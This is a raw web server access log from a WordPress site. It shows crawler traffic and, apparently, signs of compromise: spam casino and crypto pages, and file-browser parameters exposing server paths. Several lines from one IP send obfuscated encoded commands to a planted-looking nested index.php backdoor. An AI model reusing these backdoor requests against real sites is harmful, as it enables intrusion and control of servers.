185.216.113.70 - - [19/Apr/2026:09:47:24 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538343834342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313234342q3363303263353635313166386366633634366337353235386361383264373536222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:49:22 +0300] "GET /'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpSTaOaz&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:49:33 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0403-kopya-480x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:49:36 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FDJI_0137-kopya-850x479.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.195.183.184 - - [19/Apr/2026:09:49:36 +0300] "GET /detail/238962779 HTTP/2" 200 6943 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.33 - - [19/Apr/2026:09:49:40 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0240-kopya-850x320.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:49:44 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F2tYmC0R__400x400-400x320.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [19/Apr/2026:09:47:46 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538343836362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313236362q3164663933643831366464316531663538343430633163386434633833373331222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:49:48 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2Fgeri-donusum-653x375.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2864 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:49:52 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2Fcunokarviziton-150x150.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:49:56 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0249-kopya-2-850x320.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:50:00 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FxV1JKmdy_400x400-400x320.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2873 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:50:05 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0370-kopya.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2859 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:50:08 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FDJI_0123-kopya.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2861 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [19/Apr/2026:09:48:08 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538343838382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313238382q3131373639396535303761363036353064643339356261613331323938636661222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:50:12 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0289-720x400.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2861 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:50:16 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0268-kopya.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2859 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:50:20 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0310-kopya.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2859 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.195.183.3 - - [19/Apr/2026:09:50:20 +0300] "GET /free-spins-sms-verification-uk-no-deposit/ HTTP/2" 200 6959 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.33 - - [19/Apr/2026:09:50:24 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0249-kopya.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2859 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
17.246.19.7 - - [19/Apr/2026:09:50:27 +0300] "GET /exploring-the-allure-of-high-stakes-casino-games-for-thrill-seekers/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-content/languages/da_DK-28b3c3d595952907e08d98287077426c.json&path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/languages HTTP/1.1" 200 4177 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.217.33 - - [19/Apr/2026:09:50:28 +0300] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fjs%2Ftinymce%2Fplugins%2Fmedia HTTP/2" 200 3253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
17.246.23.219 - - [19/Apr/2026:09:50:29 +0300] "GET /discover-the-ultimate-potential-of-dexscreener-tools/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/comment.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6183 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
185.216.113.70 - - [19/Apr/2026:09:48:30 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538343931302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313331302q3035313233393861333635313361666535616132313439333531383366366333222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:50:32 +0300] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fsfqzb%2Flanguages%2Fprotect-uploads-fr_FR.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fsfqzb%2Flanguages HTTP/2" 200 2866 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:50:35 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2Fcunokarviziton-960x320.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2867 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:50:38 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0382-kopya-850x320.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:50:42 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2Fcunokarviziton-850x567.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:50:46 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2Fgeri-donusum-848x450.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2864 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:50:50 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0341-kopya-850x320.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [19/Apr/2026:09:48:52 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538343933322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313333322q3633376165663933333730326261326531613465613538663064333863383765222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:50:54 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FDJI_0136-kopya-720x400.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:50:58 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0374-kopya-850x320.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:51:02 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2Fcunokarviziton-653x375.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:51:06 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FDJI_0136-kopya-480x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:51:10 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0225-kopya-2-850x320.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [19/Apr/2026:09:49:14 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538343935342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313335342q3832623830366138653864356634396663386263666631633166393631346234222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:51:15 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2Frecycle-tech-219-kopya-653x276.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2874 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:51:19 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0249-kopya-720x400.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:51:23 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0370-kopya-480x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:51:27 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2Frecycle-tech-219-kopya-480x160.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2873 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.173 - - [19/Apr/2026:09:51:29 +0300] "GET /shop/synergism/serpulian881581217694.html HTTP/1.1" 200 29244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.217.33 - - [19/Apr/2026:09:51:31 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0310-kopya-720x400.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.195.215.254 - - [19/Apr/2026:09:51:32 +0300] "GET /discover-the-future-of-crypto-trading-with-solscan-3/ HTTP/2" 200 6976 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.33 - - [19/Apr/2026:09:51:35 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2Frecycle-tech-219-kopya-720x276.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2874 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [19/Apr/2026:09:49:36 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538343937362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313337362q3961646339396233643935356432393738653839386334666638306263666261222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:51:39 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0268-kopya-720x400.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:51:43 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0249-kopya-480x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2867 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.195.183.189 - - [19/Apr/2026:09:51:44 +0300] "GET /online-free-spins-no-deposit/ HTTP/2" 200 6968 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.33 - - [19/Apr/2026:09:51:46 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FDJI_0136-kopya-480x160.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:51:50 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0338-kopya-480x265.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:51:54 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0325-kopya-653x375.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [19/Apr/2026:09:49:58 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538343939382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313339382q3461656334313964616535613731653338623363303261623764303464383630222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:51:58 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0403-kopya-2-800x320.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:52:02 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FDJI_0135-kopya-720x400.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
17.246.23.76 - - [19/Apr/2026:09:52:05 +0300] "GET /begin-your-journey-with-sushiswap-a-dex-overview/?path=/var/www/vhosts/miroglu.net/error_docs HTTP/1.1" 200 7744 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
